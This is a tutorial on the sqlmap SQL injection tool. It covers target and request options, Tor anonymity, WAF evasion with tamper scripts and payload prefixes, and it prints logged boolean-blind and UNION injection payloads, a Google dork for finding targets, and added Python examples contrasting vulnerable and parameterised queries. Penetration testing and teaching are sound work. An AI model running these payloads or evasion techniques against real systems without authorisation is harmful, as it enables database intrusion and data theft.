I. What is Sqlmap
Sqlmap is an open-source automated SQL injection tool written in Python. Its main features are:
- Full support for many database management systems: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix.
- Full support for boolean-based blind, time-based blind, error-based, UNION query and stacked query injection.
- Support for connecting directly to a database, without going through an injection point, when the database credentials, IP address, port and database name are available.
- Support for enumerating users, passwords, hashes, privileges, roles, databases, tables and columns.
- Support for automatically recognising password hash formats and cracking the hashes with a dictionary.
- Support for dumping a whole table from a database, only certain columns of a table, or even only part of one column, entirely at the user's choice.
- Support for searching the DBMS for a given database name, table name or column name.
- Support for downloading or uploading files when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server.
- Support for executing arbitrary commands and retrieving their standard output when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server.
II. Installing Sqlmap
Sqlmap is an open-source project hosted on GitHub; the simplest way to install it is with git:
git clone https://github.com/sqlmapproject/sqlmap.git

III. Output verbosity
Option: -v
Sqlmap's output has seven verbosity levels, from terse to verbose (as many as the Calabash Brothers): 0, 1, 2, 3, 4, 5 and 6. Use "-v <level>" to pick one, for example "-v 6" for level 6. The default level is 1. The levels are:
- 0: only Python tracebacks, error messages [ERROR] and critical messages [CRITICAL];
- 1: additionally normal messages [INFO] and warnings [WARNING];
- 2: additionally debug messages [DEBUG];
- 3: additionally the payloads used for injection;
- 4: additionally the HTTP requests;
- 5: additionally the HTTP response headers;
- 6: additionally the HTTP response bodies.
IV. Specifying the target
Sqlmap needs at least one target to run, and several can be given at once. Targets can be specified in the following ways:
1. Connecting directly to a database
Option: -d
Use "-d" to connect directly to a database. The option takes a string describing the database, in one of two formats:
(1). When the DBMS is MySQL, Oracle, Microsoft SQL Server or PostgreSQL:
DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
(2). When the DBMS is SQLite, Microsoft Access or Firebird:
DBMS://DATABASE_FILEPATH
I used the following command to connect to the MySQL instance installed on my own machine (password and host replaced by placeholders here):
python sqlmap.py -d "mysql://root:PASSWORD@HOST:3306/DISSchool"
It failed with this error:
[CRITICAL] sqlmap requires 'python-pymysql' third-party library in order to directly connect to the DBMS 'MySQL'. You can download it from 'https://github.com/petehunt/PyMySQL/'. Alternative is to use a package 'python-sqlalchemy' with support for dialect 'mysql' installed
This means I had not installed python-pymysql, the third-party library Python uses to talk to MySQL. I had installed python-mysqldb, which also lets Python connect to MySQL, but Sqlmap evidently uses python-pymysql rather than python-mysqldb. I installed python-pymysql with:
git clone https://github.com/petehunt/PyMySQL/
cd PyMySQL/
sudo python setup.py install
With python-pymysql installed I ran the command again:
python sqlmap.py -d "mysql://root:PASSWORD@HOST:3306/DISSchool"
This time there was no error and the connection succeeded. Apart from confirming that the database really is MySQL version 5.0.0 or later, though, it did nothing. Getting Sqlmap to actually do something requires other options, which we will cover later.
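As an added example (not code from the article or from sqlmap itself), here is a small parser for the two -d target formats described above, plus a helper that masks the password before the string is written to shell history, logs or a ticket. The DBMS scheme sets and the regular expression are this example's own assumptions; a password containing "@" would need a stricter parser.

```python
import re

# Assumed DBMS scheme names for the two formats described above (hypothetical grouping,
# not taken from sqlmap's source).
NETWORK_DBMS = {"mysql", "oracle", "mssql", "postgresql"}   # DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
FILE_DBMS = {"sqlite", "access", "firebird"}                # DBMS://DATABASE_FILEPATH

_NET = re.compile(
    r"^(?P<user>[^:@/]+):(?P<password>[^@]*)@(?P<host>[^:/]+):(?P<port>\d+)/(?P<database>.+)$"
)


def parse_dbms_target(target):
    """Split a -d target string into its parts; raise ValueError on malformed input."""
    scheme, sep, rest = target.partition("://")
    if not sep or not rest:
        raise ValueError("expected DBMS://...: %r" % target)
    dbms = scheme.lower()
    if dbms in NETWORK_DBMS:
        m = _NET.match(rest)
        if not m:
            raise ValueError("expected USER:PASSWORD@HOST:PORT/DATABASE after %s://" % scheme)
        parts = m.groupdict()
        parts["port"] = int(parts["port"])
        if not 0 < parts["port"] < 65536:
            raise ValueError("port out of range: %d" % parts["port"])
        return {"dbms": dbms, **parts}
    if dbms in FILE_DBMS:
        # File-based DBMS: everything after the scheme is the database file path.
        return {"dbms": dbms, "filepath": rest}
    raise ValueError("unsupported DBMS scheme: %r" % scheme)


def redact_target(target):
    """Return the same target string with the password masked (safe to log or paste)."""
    parsed = parse_dbms_target(target)
    if "password" not in parsed:
        return target
    return "%s://%s:***@%s:%d/%s" % (
        parsed["dbms"], parsed["user"], parsed["host"], parsed["port"], parsed["database"]
    )


if __name__ == "__main__":
    sample = "mysql://root:PASSWORD@127.0.0.1:3306/DISSchool"   # constructed sample
    print(parse_dbms_target(sample))
    print(redact_target(sample))
    print(parse_dbms_target("sqlite:///tmp/test.db"))
```

Because the -d string carries a clear-text password, anything that echoes the command line (shell history, CI logs, a screenshot in a report) should go through redact_target first.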
2. Specifying a target URL
Option: -u or --url
Use "-u" or "--url" to give a single URL as the target. The option takes a URL string, which may use http or https and may include a port, for example:
python sqlmap.py -u "http://192.168.56.102:8080/user.php?id=0"
3. Parsing targets from a Burp or WebScarab proxy log
Option: -l
Use "-l" to give a Burp or WebScarab proxy log file. Sqlmap extracts the possible targets from the log and tries to inject each one in turn. The option takes the path of the log file.
I have never used WebScarab, but I use Burp all the time. Burp does not log by default; logging has to be switched on manually, as shown in the figure below:
Ticking only the proxy request data is enough. The log file path can be anything; here I named the log proxy.log and put it in my home directory.
After setting the browser's proxy to Burp and browsing a few pages, proxy.log was already tens of kilobytes. Part of its contents:
user@host:~$ more proxy.log
======================================================
7:22:52 PM  http://ocsp.digicert.com:80  [117.18.237.29]
======================================================
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
...
As you can see, the log records not only GET parameters but also cookies and POST parameters. Now let Sqlmap parse the log, find the targets automatically and test them for injection:
python sqlmap.py -l ../proxy.log
Be careful to write the log path correctly. While the command runs, Sqlmap asks for every possible target whether it should be tested. The default answer is "Y", so to test a target just press Enter.
A large log contains many possible targets, and even with the prompts this is tedious, because you have to decide each one rather than just hammering Enter. It would be nice to filter the log, and indeed you can: the option is "--scope", see section V.18.
4. Parsing targets from a sitemap file
Option: -x
To help search engines index them, many sites generate an XML sitemap specifically for search engines; Baidu's sitemap, for example, supports the XML format. Sqlmap can parse an XML sitemap directly, extract targets from it and test a whole site for injection. The option for this is "-x", for example:
python sqlmap.py -x http://www.6eat.com/sitemap.xml
The result of running that command, however, was:
[WARNING] no usable links found (with GET parameters)
No usable links with GET parameters were found. In my limited experience, sitemap URLs rarely carry GET parameters, let alone POST parameters, so this Sqlmap feature seems to be of little practical use.
5. Parsing targets from a text file
Option: -m
"-u" can only take one URL at a time, which is inconvenient when several URLs need testing. Instead, save the URLs in a text file, one per line, and pass the file with "-m"; Sqlmap reads the URLs from the file one by one and uses them as targets.
For example, given a file url.txt containing:
www.target1.com/vuln1.php?q=foobar
www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*
the following command makes Sqlmap test these URLs for injection:
python sqlmap.py -m url.txt
As before, Sqlmap thoughtfully asks for each one: "do you want to test this URL?"
6. Loading an HTTP request from a file
Option: -r
An HTTP request can be saved to a file and loaded with "-r". Sqlmap parses the file, derives the target from it and tests it.
Suppose the following request is saved in get.txt:
GET /user.php?id=1 HTTP/1.1
Host: 192.168.56.101:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Then the following command makes Sqlmap parse the file and test the request's target:
python sqlmap.py -r get.txt
7. Using Google search results as targets
Option: -g
Sqlmap can fetch the first hundred Google results and test the URLs among them that have GET parameters. Naturally, the network you are on must be able to reach Google. This is the example of "-g" from the Sqlmap manual:
python sqlmap.py -g "inurl:\".php?id=1\""
8. Loading targets from a configuration file
Option: -c
Use "-c" to give a configuration file (for example sqlmap.conf). Sqlmap parses the file and acts according to its settings. The configuration file can specify the target, and in fact can set the values of all the other options as well.
Sqlmap's installation directory contains a file named sqlmap.conf, a template configuration file; reading it makes clear what a configuration file is about.
V. Requests
HTTP is a complex protocol. A request has one of many methods, and can carry parameters in different places (GET, POST, cookie, User-Agent and so on). Often only a request with a specific method, carrying specific parameters in specific places, is a valid one. So besides the target, Sqlmap sometimes needs to be told details of the HTTP request. The options below all specify such details.
1. HTTP method
Option: --method
Sqlmap normally works out by itself whether to use GET or POST, but sometimes a rarer method such as PUT is needed, and then "--method" specifies it, for example "--method=PUT".
2. POST data
Option: --data
The data given with this option is submitted as POST data, and Sqlmap also tests it for injection. For example:
python sqlmap.py -u "http://192.168.56.102:8080/user.php" --data="id=0&name=werner"
3. Specifying the parameter delimiter
Option: --param-del
In the previous example the "--data" value "id=0&name=werner" really consists of two parts, "id=0" and "name=werner", separated by the default delimiter "&". "--param-del" sets a different delimiter, for example:
python sqlmap.py -u "http://192.168.56.102:8080/user.php" --data="id=0;name=werner" --param-del=";"
4. Cookies
Options: --cookie, --cookie-del, --drop-set-cookie and --load-cookies
These options are needed in two situations:
- the page to test is only reachable when logged in, and the login state is identified by a cookie;
- you want to test for cookie injection.
When "--level" is 2 or higher, Sqlmap tests the cookies for injection; more on "--level" below.
(1). "--cookie" and "--cookie-del"
Log in to the target site in a browser, copy the cookies that keep the session alive, and pass them with "--cookie", for example:
python sqlmap.py -u "http://192.168.56.102:8080/user.php" --cookie "JSESSIONID=E5D6C8C81;NAME=werner;"
Unlike POST parameters, cookies use ";" as the default delimiter; to change it, use "--cookie-del".
(2). "--drop-set-cookie"
If the HTTP response carries a "Set-Cookie" header, Sqlmap automatically adopts the cookies it sets and tests them too. If you do not want that, add "--drop-set-cookie" and Sqlmap will ignore "Set-Cookie".
(3). "--load-cookies"
This option loads cookies from a file in Netscape or wget format.
wget can save and load cookies, for example:
# Log in to the server. This can be done only once.
wget --save-cookies cookies.txt \
--post-data 'user=foo&password=bar' \
http://server.com/auth.php
# Now grab the page or pages we care about.
wget --load-cookies cookies.txt \
-p http://server.com/interesting/article.php
5. User-Agent
Options: --user-agent and --random-agent
By default the User-Agent of the requests Sqlmap sends is:
sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)
"--user-agent" sets a specific User-Agent value. Since we may not remember what a normal User-Agent looks like, there is also "--random-agent", which makes Sqlmap pick one at random from the file ./txt/user-agents.txt. Note that a single User-Agent is used for the whole session; it is not re-randomised for every request.
Count the lines of user-agents.txt with:
cat sqlmap/txt/user-agents.txt | wc -l
The result is 4211; this includes blank lines and comments, but all in all the file holds over four thousand User-Agent strings.
When "--level" is 3 or higher, Sqlmap tests the User-Agent for injection; more on "--level" below.
6. Host
Option: --host
This option sets the Host header value manually.
When "--level" is 5 or higher, Sqlmap tests the Host header for injection; more on "--level" below.
7. Referer
Option: --referer
This option sets the Referer header value. By default the requests Sqlmap sends carry no Referer header.
When "--level" is 3 or higher, Sqlmap tests the Referer for injection; more on "--level" below.
8. Extra HTTP headers
Option: --headers
This option adds header fields to the requests Sqlmap sends; separate several fields with "\n". For example, the command:
python sqlmap.py -u "http://192.168.56.101:8080/" -v 5 --headers "X-A:A\nX-B: B"
sends this request:
GET / HTTP/1.1
X-B: B
Host: 192.168.56.101:8080
Accept-encoding: gzip,deflate
X-A: A
Accept: */*
User-agent: sqlmap/1.1.10#stable (http://sqlmap.org)
Connection: close
"-v 5" is added so that Sqlmap prints the request it sends, which lets us see the result.
9. Authentication
Options: --auth-type and --auth-cred
These options handle HTTP authentication. "--auth-type" selects the scheme; three are supported:
- Basic
- Digest
- NTLM
"--auth-cred" supplies the credentials, in the form "username:password".
For example:
python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"
10. Certificate-based authentication
Option: --auth-file
If the web server requires a client certificate, this option gives a PEM-format certificate file. Client authentication in SSL is optional; in practice usually only the server presents its certificate for the client to verify, and clients are rarely asked for their own.
11. Ignoring 401
Option: --ignore-401
This option ignores 401 (Unauthorized) errors.
12. HTTP(S) proxy
Options: --proxy, --proxy-cred, --proxy-file and --ignore-proxy
"--proxy" sets an HTTP(S) proxy, in the form "http(s)://url:port". If the proxy requires authentication, "--proxy-cred" supplies the credentials, in the form "username:password".
"--proxy-file" gives a file holding a list of proxies; Sqlmap uses them in turn, dropping a proxy and moving to the next whenever it has any connection problem.
"--ignore-proxy" ignores the local proxy settings.
13. The Tor anonymity network
Options: --tor, --tor-type, --tor-port and --check-tor
Whatever the reason, if you want to stay anonymous, rather than using a single HTTP(S) proxy it is better to install software such as Privoxy and configure a Tor client following the Tor installation guide. Once that is set up, "--tor" makes Sqlmap use the Tor proxy automatically.
To set the Tor proxy type and port by hand, use "--tor-type" and "--tor-port", for example:
--tor-type=SOCKS5 --tor-port 9050
If a high degree of anonymity is required, add "--check-tor": Sqlmap then makes sure all traffic goes through Tor, and warns and exits if the Tor proxy is not working. The check is done by visiting the "Are you using Tor?" page.
14. Delay between HTTP requests
Option: --delay
Sending requests too frequently may get noticed by the site or have other unwanted consequences. "--delay" sets the delay between requests in seconds, as a floating-point number; "--delay 1.5" means a 1.5-second delay. By default there is no delay.
15. Timeout
Option: --timeout
The default timeout is 30 seconds; "--timeout" changes it, for example "--timeout 44.5" sets a timeout of 44.5 seconds.
16. Maximum retries after a timeout
Option: --retries
After a timeout Sqlmap retries, at most 3 times by default; "--retries" sets the maximum number of retries.
17. Randomising parameter values
Option: --randomize
With this option Sqlmap generates a random value for the parameter in every request, keeping the type and length of the original value.
18. Filtering a proxy log with a regular expression
Option: --scope
Gives a Python regular expression to filter the proxy log; only targets matching it are tested, for example:
python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
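As an added example that serves both section IV.3 (the proxy-log layout shown there) and this section's "--scope" filter (it is not sqlmap's own log parser), the code below parses a log in that layout, rebuilds each request's URL, applies a scope regular expression and keeps only the requests that carry GET or POST parameters, which is also what produced the "no usable links found" warning for the sitemap earlier. The sample log is constructed for this example; the entry layout (separator lines, a time/URL/IP line, then the raw request) follows the excerpt above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in the Burp proxy-log layout shown in section IV.3 (not a real capture).
SAMPLE_LOG = """\
======================================================
7:22:52 PM  http://ocsp.digicert.com:80  [117.18.237.29]
======================================================
POST / HTTP/1.1
Host: ocsp.digicert.com
Content-Type: application/ocsp-request

req=AAAA
======================================================
7:23:10 PM  http://www.target.com:80  [192.0.2.10]
======================================================
GET /user.php?id=1 HTTP/1.1
Host: www.target.com
Cookie: JSESSIONID=E5D6C8C81

======================================================
7:23:15 PM  http://www.target.net:80  [192.0.2.11]
======================================================
GET /index.html HTTP/1.1
Host: www.target.net

======================================================
7:23:20 PM  http://www.target.org:80  [192.0.2.12]
======================================================
POST /login.php HTTP/1.1
Host: www.target.org
Content-Type: application/x-www-form-urlencoded

user=werner&pass=secret
======================================================
"""

SEPARATOR = re.compile(r"^=+$")
ENTRY_HEADER = re.compile(r"^(?P<time>\d{1,2}:\d{2}:\d{2} [AP]M)\s+(?P<base>\S+)\s+\[(?P<ip>[^\]]+)\]$")
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$")


def parse_burp_log(text):
    """Return one dict per logged request: time, base URL, ip, method, path, headers, body."""
    entries, block, header = [], [], None
    for line in text.splitlines() + ["="]:          # sentinel separator flushes the last block
        if not SEPARATOR.match(line.strip()):
            block.append(line)
            continue
        chunk = "\n".join(block).strip("\n")
        block = []
        if not chunk:
            continue
        m = ENTRY_HEADER.match(chunk.strip())
        if m:                                        # "time  base-url  [ip]" line
            header = m.groupdict()
            continue
        r = REQUEST_LINE.match(chunk.split("\n")[0])
        if header is not None and r:                 # raw request following a header line
            head, _, body = chunk.partition("\n\n")
            headers = {k.strip(): v.strip() for k, v in
                       (h.split(":", 1) for h in head.split("\n")[1:] if ":" in h)}
            entries.append({**header, **r.groupdict(), "headers": headers, "body": body.strip()})
        header = None
    return entries


def select_targets(entries, scope=None, require_params=True):
    """Apply a --scope style regex and keep requests that carry GET or POST parameters."""
    picked = []
    for e in entries:
        url = e["base"].rstrip("/") + e["path"]
        if scope and not re.search(scope, url):
            continue
        get_params = dict(parse_qsl(urlsplit(url).query))
        post_params = dict(parse_qsl(e["body"])) if e["method"] == "POST" else {}
        if require_params and not (get_params or post_params):
            continue
        picked.append({"url": url, "method": e["method"], "get": get_params, "post": post_params})
    return picked


if __name__ == "__main__":
    for t in select_targets(parse_burp_log(SAMPLE_LOG), scope=r"(www)?\.target\.(com|net|org)"):
        print(t["method"], t["url"], t["get"] or t["post"])
```

Without a scope, every host the browser touched while Burp was logging (here the OCSP responder) becomes a candidate; the scope regex is what keeps a test run inside the systems you are authorised to assess.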
19. Avoiding being blocked for too many bad requests
Options: --safe-url, --safe-post, --safe-req and --safe-freq
Some servers block a client that produces too many bad requests, and Sqlmap's tests generate plenty of them. To avoid the block, a few normal requests can be sent now and then to placate the server. Four options control this mechanism:
- --safe-url: a safe URL that is visited every so often
- --safe-post: POST data to send when visiting the safe URL
- --safe-req: load the safe HTTP request from a file
- --safe-freq: how many test requests to send between two visits to the safe URL
A "safe" URL here means one that returns 200 and never errors. Accordingly, Sqlmap never runs injection tests against the safe URL.
20. Turning off URL encoding
Option: --skip-urlencode
Sqlmap URL-encodes the URL by default; this option turns that off.
21. Bypassing CSRF protection
Options: --csrf-token and --csrf-url
Many sites now defend against CSRF by adding a hidden form field whose value is a randomly generated token. Sqlmap recognises this protection automatically and handles it, but the automatic detection can fail, and then these two options are needed.
"--csrf-token" names the hidden field that holds the token. If the field name is not one of the usual anti-CSRF names Sqlmap may not recognise it and it must be given by hand. In Django, for example, the field is "csrfmiddlewaretoken", which is obviously CSRF-related.
"--csrf-url" fetches the token from an arbitrary URL. It is useful when the vulnerable target URL does not itself contain the token and it has to be obtained from another address.
22. Forcing SSL
Option: --force-ssl
23. Running Python code before every request
Option: --eval
Straight to the example:
python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"
Before each request is sent, Sqlmap recomputes the hash from the id value and updates the hash in the GET request.
VI. Optimization
These options tune Sqlmap's performance.
1. One-shot optimisation
Option: -o
Adding this option is equivalent to adding the following three optimisation options together:
- --keep-alive
- --null-connection
- --threads=3 (unless a better value is already set)
Their meanings are explained below.
2. HTTP keep-alive
Option: --keep-alive
Makes Sqlmap use persistent HTTP connections. This option is incompatible with "--proxy".
3. HTTP null connection
Option: --null-connection
A special kind of HTTP request can obtain the size of a response without fetching the response body. In boolean-based blind injection this obviously saves a lot of bandwidth. The server must support it, of course. This option is incompatible with "--text-only".
4. HTTP concurrency
Option: --threads
Sets the maximum number of concurrent requests Sqlmap may make. For both performance and the target's capacity, do not go above 10.
VII. Injection
These options choose which parameters to test, customise the payload and select tamper scripts.
1. Injection points to test
Options: -p and --skip
By default Sqlmap tests all GET and POST parameters; with level 2 or higher it also tests cookie parameters, and with level 3 or higher the User-Agent and Referer. You can also give a comma-separated list of parameters to test by hand, and the parameters in that list are not subject to the level restriction. That is what "-p" does.
For example, to test only the GET parameter "id" and the User-Agent:
-p "id,user-agent"
To leave a parameter out, use "--skip". For instance, with level 5 set but without testing the User-Agent and Referer:
--level=5 --skip="user-agent,referer"
Sometimes you meet pseudo-static pages. A dynamic page lists its parameters openly, for example:
/user.php?id=1
Clearly the parameter is id with value 1. A pseudo-static page might write it as:
/user/1/
hiding the parameter inside the URL path. Normally Sqlmap does not test the parameters of such pseudo-static pages, because it cannot tell which part is a parameter. To test one, just add "*" to tell Sqlmap where the pseudo-static parameter is; from then on it is treated just like a GET parameter. For example:
python sqlmap.py -u "http(s)://target.cc/user/1*/"
2. Specifying the DBMS
Option: --dbms
dbms stands for "Database Management System". By default Sqlmap detects the DBMS automatically; the supported ones are:
- MySQL
- Oracle
- PostgreSQL
- Microsoft SQL Server
- Microsoft Access
- Firebird
- SQLite
- Sybase
- SAP MaxDB
- DB2
If the automatic detection fails, or you do not want Sqlmap to fingerprint the database, "--dbms" sets the DBMS by hand, for example "--dbms postgresql".
For MySQL and Microsoft SQL Server the version can be given as well:
--dbms MySQL <version>
--dbms Microsoft SQL Server <version>
For MySQL the version looks like 5.0; for Microsoft SQL Server it looks like 2005.
If "--fingerprint" is added together with "--dbms", Sqlmap fingerprints only within the given DBMS.
Use "--dbms" only when you are sure; otherwise it is better to let Sqlmap detect the DBMS itself.
3. Specifying the operating system running the DBMS
Option: --os
By default Sqlmap detects the operating system running the DBMS automatically. The fully supported operating systems are:
- Linux
- Windows
If you are certain, "--os" sets the operating system running the DBMS. Again, only use this option when certain; otherwise let Sqlmap detect it.
4. Forcing big numbers for invalid parameter values
Option: --invalid-bignum
Injection tests sometimes need an invalid parameter value. Normally Sqlmap negates the existing value (for example id=13 becomes id=-13). With "--invalid-bignum" it uses a big number instead (for example id=99999999).
5. Forcing logical operators for invalid parameter values
Option: --invalid-logical
Injection tests sometimes need an invalid parameter value. Normally Sqlmap negates the existing value (for example id=13 becomes id=-13). With "--invalid-logical" it uses a logical operator instead (for example id=13 AND 18=19).
6. Forcing strings for invalid parameter values
Option: --invalid-string
Injection tests sometimes need an invalid parameter value. Normally Sqlmap negates the existing value (for example id=13 becomes id=-13). With "--invalid-string" it uses a string instead (for example id=akewmc).
7. Turning off payload casting
Option: --no-cast
When retrieving results Sqlmap casts every value to a string type and replaces NULL values with a blank character. This prevents errors such as concatenating NULL with a string and simplifies the retrieval process. There have been reports, however, that on old MySQL versions this causes retrieval problems, so "--no-cast" was added to tell Sqlmap not to do it.
8. Turning off string escaping
Option: --no-escape
Sqlmap sometimes uses single-quoted string values in payloads, such as "SELECT 'foobar'". By default these values are encoded; the example becomes:
"SELECT CHAR(102)+CHAR(111)+CHAR(111)+CHAR(98)+CHAR(97)+CHAR(114)". This both obfuscates the payload, so that an onlooker cannot immediately see what it contains, and keeps the string intact when the back end applies escaping functions such as magic_quotes or mysql_real_escape_string. In some situations the encoding must be turned off, for instance to shorten the payload, and "--no-escape" does that.
9. Customising the payload
Options: --prefix and --suffix
Sometimes injection only succeeds when a user-specified suffix is appended to the payload. Another scenario is that the user already knows how the query is written, and can then give the payload's prefix and suffix directly to complete detection and injection.
An example of vulnerable source code:
$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
For such a case Sqlmap can detect the boundaries automatically, or they can be given by hand:
python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
The final SQL statement becomes:
SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1
This statement is syntactically correct and the payload can execute.
In simple test environments Sqlmap detects the boundaries and completes the injection without being given them, but real-world applications can be complex, with nested JOIN queries for example, and then the boundaries have to be pointed out to Sqlmap.
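As an added example (not code from the article), the script below rebuilds the vulnerable query shape from the PHP snippet above in Python with an in-memory SQLite database and runs it beside the parameterised form. It uses the two boolean-based blind payloads printed later in this section (the "true" and "false" pair with the ')…AND (' boundary) to show why the prefix "')" and suffix "AND ('abc'='abc" close the query correctly, and that the same input is just an id value once the query is parameterised. The table contents are constructed for this example.

```python
import sqlite3

# Constructed sample table; the column shape mirrors the "users" table in the PHP example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("1", "luther"), ("2", "fluffy")])
    return conn


def vulnerable_sql(user_id):
    """Same construction as the PHP line above: the parameter is spliced into the SQL text."""
    return "SELECT * FROM users WHERE id=('" + user_id + "') LIMIT 0, 1"


def lookup_vulnerable(conn, user_id):
    return conn.execute(vulnerable_sql(user_id)).fetchall()


def lookup_parameterized(conn, user_id):
    # The driver sends the value separately from the SQL text, so quotes and
    # parentheses in user_id never reach the parser as syntax.
    return conn.execute("SELECT * FROM users WHERE id=(?) LIMIT 0, 1", (user_id,)).fetchall()


# The boolean-blind pair from the [PAYLOAD] lines in section VII.10: the prefix "')"
# closes the open string and parenthesis, the suffix "AND ('..'='.." reopens them.
TRUE_PAYLOAD = "1') AND 6711=6711 AND ('RgoX'='RgoX"
FALSE_PAYLOAD = "1') AND 6904=7395 AND ('xBlu'='xBlu"


def demo():
    """Row counts for each query style; the difference between the two 'vuln' entries is the
    signal a boolean-based blind test looks for, and it vanishes with a bound parameter."""
    conn = make_db()
    return {
        "vuln_true": len(lookup_vulnerable(conn, TRUE_PAYLOAD)),
        "vuln_false": len(lookup_vulnerable(conn, FALSE_PAYLOAD)),
        "safe_true": len(lookup_parameterized(conn, TRUE_PAYLOAD)),
        "safe_false": len(lookup_parameterized(conn, FALSE_PAYLOAD)),
        "safe_legit": len(lookup_parameterized(conn, "1")),
    }


if __name__ == "__main__":
    print(vulnerable_sql("1') <PAYLOAD> AND ('abc'='abc"))
    print(demo())
```

With string splicing the "true" payload returns the row and the "false" one does not, which is exactly the page difference Sqlmap compares; with a bound parameter both inputs are looked up as literal ids and return nothing, while the legitimate id still works.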
10. Tampering with the injected data
Option: --tamper
Apart from encoding strings with CHAR(), Sqlmap does not obfuscate the payload at all. This option obfuscates the payload to get past an IPS or WAF. It takes the name of a tamper script. If the script lives in the tamper/ directory of the Sqlmap installation, the path and extension can be omitted and just the file name given. Multiple tamper scripts are separated by spaces.
The tamper/ directory holds many ready-made tamper scripts; their job is to obfuscate the payload. You can also write your own, which is an advanced use of Sqlmap. A valid tamper script looks like this:
# Library that must be imported
from lib.core.enums import PRIORITY

# Define this tamper script's priority
__priority__ = PRIORITY.NORMAL

def tamper(payload, **kwargs):
    '''Description of the tamper script goes here'''
    retVal = payload
    # Code that modifies the payload goes here
    # Return the modified payload
    return retVal
Here is an example against a MySQL target, assuming the greater-than sign, spaces and the keyword SELECT at the start of a query are all banned:
python sqlmap.py -u "http://192.168.56.101:8080/ScorePrj/?id=1" \
--tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
Part of its output:
[12:55:52] [DEBUG] cleaning up configuration parameters
[12:55:52] [INFO] loading tamper script 'between'
[12:55:52] [INFO] loading tamper script 'randomcase'
[12:55:52] [INFO] loading tamper script 'space2comment'
[...]
[12:55:53] [INFO] testing for SQL injection on GET parameter 'id'
[12:55:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:55:53] [PAYLOAD] 1
[12:55:53] [PAYLOAD] 1)/**/aNd/**/8083=4737/**/aNd/**/(4754/**/BetwEen/**/4754/**/aNd/**/4754
[12:55:53] [PAYLOAD] 1)/**/anD/**/4962=4962/**/anD/**/(2361/**/BeTweEN/**/2361/**/anD/**/2361
[12:55:53] [PAYLOAD] 1/**/aNd/**/9754/**/BETwEEn/**/1206/**/aNd/**/1206
[12:55:53] [PAYLOAD] 1/**/AnD/**/4962/**/beTweEn/**/4962/**/AnD/**/4962
[12:55:53] [PAYLOAD] 1/**/aND/**/2741/**/BetWeEn/**/9323/**/aND/**/9323--/**/Ihsa
[12:55:53] [PAYLOAD] 1/**/anD/**/4962/**/BetweEN/**/4962/**/anD/**/4962--/**/wVUI
[12:55:53] [PAYLOAD] 1')/**/anD/**/1694=6061/**/anD/**/('zLwu'='zLwu
[12:55:53] [PAYLOAD] 1')/**/ANd/**/4962=4962/**/ANd/**/('Dsfw'='Dsfw
[12:55:53] [PAYLOAD] 1'/**/aND/**/6307=8901/**/aND/**/'fKLn'='fKLn
[12:55:53] [PAYLOAD] 1'/**/aNd/**/4962=4962/**/aNd/**/'YFsp'='YFsp
[12:55:53] [PAYLOAD] 1%'/**/anD/**/3549=6854/**/anD/**/'%'='
[12:55:53] [PAYLOAD] 1%'/**/aND/**/4962=4962/**/aND/**/'%'='
[...]
[12:55:54] [PAYLOAD] 1)/**/uNIoN/**/alL/**/Select/**/nuLl--/**/NRtq
[12:55:54] [PAYLOAD] 1)/**/UnIOn/**/alL/**/sElEcT/**/nuLL,nuLL--/**/jalk
[12:55:54] [PAYLOAD] 1)/**/Union/**/aLl/**/seLeCt/**/nuLL,nuLL,nuLL--/**/ylpg
[...]
Without the tamper scripts, the same run prints:
[...]
[13:00:12] [INFO] testing for SQL injection on GET parameter 'id'
[13:00:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:00:12] [PAYLOAD] 1) AND 9902=5632 AND (5820=5820
[13:00:12] [PAYLOAD] 1) AND 6711=6711 AND (7174=7174
[13:00:12] [PAYLOAD] 1 AND 7140=6136
[13:00:12] [PAYLOAD] 1 AND 6711=6711
[13:00:12] [PAYLOAD] 1 AND 1693=7532-- oqcR
[13:00:12] [PAYLOAD] 1 AND 6711=6711-- qAPJ
[13:00:12] [PAYLOAD] 1') AND 6904=7395 AND ('xBlu'='xBlu
[13:00:12] [PAYLOAD] 1') AND 6711=6711 AND ('RgoX'='RgoX
[13:00:12] [PAYLOAD] 1' AND 6469=7302 AND 'maCj'='maCj
[13:00:12] [PAYLOAD] 1' AND 6711=6711 AND 'pSYg'='pSYg
[13:00:12] [PAYLOAD] 1%' AND 7516=3605 AND '%'='
[13:00:12] [PAYLOAD] 1%' AND 6711=6711 AND '%'='
[...]
